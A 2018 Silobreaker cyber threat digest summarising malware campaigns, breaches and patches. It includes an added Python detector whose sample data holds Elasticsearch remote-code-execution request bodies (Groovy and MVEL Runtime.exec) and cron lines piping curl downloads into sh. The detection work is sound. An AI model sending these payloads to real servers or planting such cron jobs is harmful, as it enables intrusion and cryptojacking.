Silobreaker Daily Cyber Digest – 13 December 2018
Shamoon variants appear in the wild, possibly used in attack against Saipem
- Chronicle researchers discovered that two new samples of Shamoon malware were uploaded to VirusTotal from Italy on December 10th, 2018.
- The timing of the upload corresponds with the recent cyber attack against Italian oil company Saipem. In an update on the attack, Saipem claimed it was targeted by a Shamoon variant.
- Bleeping Computer note that one of the variants may have been uploaded to VirusTotal by Saipem itself in its efforts to determine the nature of the malware that affected it. However, Chronicle’s investigation is still ongoing, and no definite conclusions have been drawn to date.
- Shamoon is disk-wiping malware that targeted Saudi Aramco in 2012, erasing data from over 35,000 devices. Four years later, in 2016, the malware was seen in attacks against private organizations in the Middle East.
Operation Sharpshooter targets global defence and critical infrastructure
- McAfee researchers discovered a new global campaign, dubbed Operation Sharpshooter, that has focused on organizations predominantly in the nuclear, defence, energy and financial sectors. In October and November 2018, the campaign targeted 87 organizations worldwide, primarily those based in the US.
- The first stage of the attack involves a document containing malicious macros that, once enabled, download a second-stage implant that McAfee has dubbed Rising Sun. Rising Sun is a fully functional backdoor used for reconnaissance on the victim’s system. The information the implant gathers is used to determine the next steps of the operation. The backdoor reuses source code from the Duuzer Trojan used by the Lazarus Group.
- Based on several similarities with other Lazarus Group attacks, the researchers do not rule out the possibility of the group being behind the operation; however, they warn that these similarities could be false flags.
Source (Includes IOCs)
Trend Micro observe cryptocurrency miner spreading via old bugs in Elasticsearch
- The attack utilised two old vulnerabilities: CVE-2015-1427, a flaw in Elasticsearch’s Groovy scripting engine that allows remote attackers to bypass the script sandbox and execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a flaw in the default configuration of older Elasticsearch versions, which left dynamic scripting enabled and so allowed remote code execution through crafted search requests.
- Once the attacker gains the ability to run arbitrary commands on the compromised system, they can attempt to escalate privileges or pivot to other systems. The payload downloads two files, devtools and config[.]json, and the script then deploys the CoinMiner cryptocurrency miner.
- If other miners are detected on the system, their running processes are killed. A cron job then re-runs the miner every ten minutes.
Source (Includes IOCs)
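As an added example (not code from the Silobreaker digest or from Trend Micro’s report), the following Python scans a constructed request log for search requests carrying a script that reaches the JVM runtime, the shape both the MVEL (CVE-2014-3120) and Groovy sandbox-bypass (CVE-2015-1427) exploits take, and scans constructed crontab lines for the download-and-execute persistence the item describes. The log format (a reverse proxy in front of Elasticsearch logging "client method path body"), the IP addresses, URLs and /tmp paths are assumptions; only the file names devtools and config.json come from the item.

```python
"""Added example, not from the digest or Trend Micro's report: detect the
Elasticsearch scripting abuse and the cron persistence described above.

Assumptions (constructed for illustration, not real telemetry):
  * a reverse proxy in front of Elasticsearch logs one request per line as
    "<client> <method> <path> <body>" with "-" for an empty body;
  * the IPs, URLs and /tmp paths are invented; only the file names devtools
    and config.json come from the digest item.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import quote, unquote


@dataclass
class Finding:
    source: str   # "access_log" or "crontab"
    reason: str
    line: str


# A search request whose JSON carries a script block ...
SCRIPT_KEY = re.compile(r'"(?:script|script_fields|inline)"\s*:', re.I)
# ... that reaches into the JVM to spawn a process. Both the MVEL exploit for
# CVE-2014-3120 and the Groovy sandbox bypass for CVE-2015-1427 must name one
# of these to run a shell command, so this is what to alert on.
JVM_EXEC = re.compile(r'java\.lang\.Runtime|getRuntime\s*\(|ProcessBuilder', re.I)

# Cron-stage indicators: fetch from the internet, pipe it into a shell, or run
# something out of a world-writable directory.
REMOTE_FETCH = re.compile(r'\b(?:curl|wget)\b[^|;&]*https?://', re.I)
PIPE_TO_SHELL = re.compile(r'\|\s*(?:ba)?sh\b')
TMP_EXEC = re.compile(r'(?:^|[\s;|&])/(?:tmp|var/tmp|dev/shm)/\S+')


def scan_access_line(line: str) -> Optional[Finding]:
    parts = line.split(' ', 3)
    if len(parts) != 4:
        return None
    client, method, path, body = parts
    if '/_search' not in path:
        return None
    # The script may sit in the POST body or, for the GET form, in the
    # percent-encoded ?source= parameter, so inspect both after decoding.
    payload = unquote(path) + ' ' + ('' if body == '-' else body)
    if SCRIPT_KEY.search(payload) and JVM_EXEC.search(payload):
        endpoint = path.split('?', 1)[0]
        return Finding('access_log',
                       f'{method} {endpoint} from {client} carries a script that spawns a process',
                       line)
    return None


def scan_cron_line(line: str) -> Optional[Finding]:
    line = line.strip()
    if not line or line.startswith('#'):
        return None
    fields = line.split(None, 5)      # five schedule fields, then the command
    if len(fields) < 6:
        return None
    schedule, command = ' '.join(fields[:5]), fields[5]
    reasons = []
    if REMOTE_FETCH.search(command):
        reasons.append('fetches from a remote URL')
    if PIPE_TO_SHELL.search(command):
        reasons.append('pipes the download into a shell')
    if TMP_EXEC.search(command):
        reasons.append('executes from a world-writable directory')
    if not reasons:
        return None
    return Finding('crontab', f'[{schedule}] ' + '; '.join(reasons), line)


def scan(access_log: List[str], crontab: List[str]) -> List[Finding]:
    found = [f for f in map(scan_access_line, access_log) if f]
    found += [f for f in map(scan_cron_line, crontab) if f]
    return found


# Constructed samples. The two script bodies mirror the public exploit shape
# for each CVE (a Groovy sandbox escape and an MVEL expression).
GROOVY_BODY = ('{"size":1,"script_fields":{"x":{"script":"java.lang.Math.class'
               '.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"id\\")",'
               '"lang":"groovy"}}}')
MVEL_BODY = ('{"script_fields":{"x":{"script":"import java.lang.*; Runtime'
             '.getRuntime().exec(\\"wget http://203.0.113.50/devtools\\")"}}}')
ACCESS_LOG = [
    '10.0.0.5 GET /_cluster/health -',
    '10.0.0.7 POST /logs-2018.12/_search {"query":{"match":{"msg":"error"}}}',
    '203.0.113.9 POST /_search ' + GROOVY_BODY,
    '203.0.113.9 GET /_search?source=' + quote(MVEL_BODY, safe='') + ' -',
]
CRONTAB = [
    '# m h dom mon dow command',
    '0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf',
    '*/10 * * * * curl -fsSL http://203.0.113.50/devtools | sh',
    '*/10 * * * * /tmp/.x/devtools -c /tmp/.x/config.json',
]

if __name__ == '__main__':
    for f in scan(ACCESS_LOG, CRONTAB):
        print(f'{f.source}: {f.reason}\n    {f.line}')
```

Running the block flags the two scripted search requests and the two cron entries while leaving the cluster-health call, the ordinary match query and the logrotate job alone. The script-key match on its own is not enough to alert on, since legitimate scripted fields exist; pairing it with a JVM process-spawning call is what separates exploitation from normal use.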
APT28’s Dear Joohn campaign targets NATO-aligned and former USSR states
- Researchers from Palo Alto Networks’ Unit 42 identified a new campaign by APT28 dubbed Dear Joohn. Based on analysis of the threat actor’s activity between mid-October and mid-November 2018, the researchers found that the campaign delivered variants of either Zebrocy or Cannon, targeting government agencies of NATO-aligned and former USSR nation states across four continents.
- The attack vector consisted of spear phishing emails sent from accounts registered to a legitimate Czech service provider. These distributed Word files containing generic lure images that tricked victims into enabling macros. The file names often featured topics relating to current events to entice users into opening the malicious attachments.
Source (Includes IOCs)
Recently patched zero-day being exploited in the wild
- Researchers at Kaspersky Lab have discovered that CVE-2018-8611, a recently patched zero-day vulnerability, is being exploited in the wild by a new threat group known as SandCat, which has been targeting entities in Africa and the Middle East.
- Several different builds of an exploit leveraging the vulnerability were discovered, including one adapted for the latest Windows versions.
Leaks and Breaches
Misconfigured server exposes taxpayer ID numbers for 120 million Brazilian citizens
- InfoArmor found that a misconfigured Apache web server exposed the taxpayer identification numbers, also known as Cadastro de Pessoas Físicas (CPFs), of 120 million Brazilian nationals. The server was discovered in March 2018, but it is unknown for how long the data was exposed or whether it was discovered by other parties.
- InfoArmor found that each exposed CPF was also linked to a person’s personally identifiable information, including their banks, loans, repayments, credit and debit history, voting history, full name, emails, and more.
US school department suffers data breach
- Approximately 2,000 former and current employees of the AOS 77 school district in Washington County, Maine, have been alerted to a data breach that may have compromised their personal information. The information allegedly included dates of birth, addresses and Social Security numbers; no information about students was involved.
Mozilla release security updates to fix bugs in Firefox and Firefox ESR
- A total of 17 flaws were addressed, three of which were rated critical and four rated high. The critical flaws are memory safety bugs in both Firefox 64 and Firefox ESR 60.4 tagged as CVE-2018-12406 and CVE-2018-12405.
SAP release patch for critical vulnerability in Hybris Commerce
- CVE-2018-2505 is a critical cross-site scripting vulnerability in SAP Hybris Commerce storefronts, rated 9.3 on the CVSS scale.
- An attacker could exploit the flaw by tricking a user into clicking a specially crafted link. If successful, the attacker’s script would be injected into the page and executed in the victim’s browser.
Shipping industry releases guidelines on cyber threats, provides examples of past incidents
- A group of 21 international shipping associations and industry bodies released ‘Guidelines on Cyber Security onboard Ships’, which documents potential cyber threats aboard ships and at ports.
- The report also describes several past incidents, for example an Electronic Chart Display and Information System (ECDIS) infected by a virus, which delayed the ship’s departure and incurred repair costs of hundreds of thousands of dollars. Other incidents include a ransomware infection of a ship’s systems and the use of USB thumb drives to infect systems with malware.
Supermicro dismisses reports of malicious hardware
- Several weeks ago, Bloomberg published a story alleging that Chinese intelligence services were planting malicious components in Supermicro motherboards during the manufacturing process. In response to these allegations, Supermicro conducted an investigation in collaboration with a third party, after which it stated that no malicious hardware was detected on any of its motherboards and that no evidence exists to suggest this has ever happened.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.